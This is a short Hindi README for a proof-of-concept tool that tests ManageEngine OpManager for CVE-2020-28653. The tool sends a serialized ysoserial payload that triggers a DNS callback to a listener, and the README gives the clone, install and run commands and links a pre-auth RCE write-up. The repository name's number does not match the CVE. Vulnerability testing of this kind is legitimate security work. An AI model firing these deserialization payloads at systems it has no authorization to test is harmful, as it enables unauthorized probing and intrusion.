
यह प्रूफ ऑफ कॉन्सेप्ट यह पता लगाता है कि क्या कोई Manage Engine OpManager इंस्टेंस CVE-2020-28653 के लिए कमजोर है। पता लगाने की प्रक्रिया में इंस्टेंस को क्रमबद्ध पेलोड युक्त अनुरोध भेजा जाता है। पेलोड के डी-सीरियलाइज़ होने पर, यह इंस्टेंस को DNS लुकअप करने के लिए प्रेरित करेगा।
निम्न कमांड चलाकर रिपॉज़िटरी क्लोन करें:
git clone https://github.com/intrigueio/cve-2020-2853-poc
निम्न कमांड चलाकर आवश्यक निर्भरताएँ इंस्टॉल करें:
bundle install
bundle exec ruby CVE-2020-28653.rb [options]
-t target target to exploit (including scheme) e.g http://localhost:8060
-l listener DNS Listener e.g 1766x23ymcldy2ppolrnvxngc7ix6m.burpcollaborator.net
-p /path/to/ysoserial.jar Path to ysoserial.jar
https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/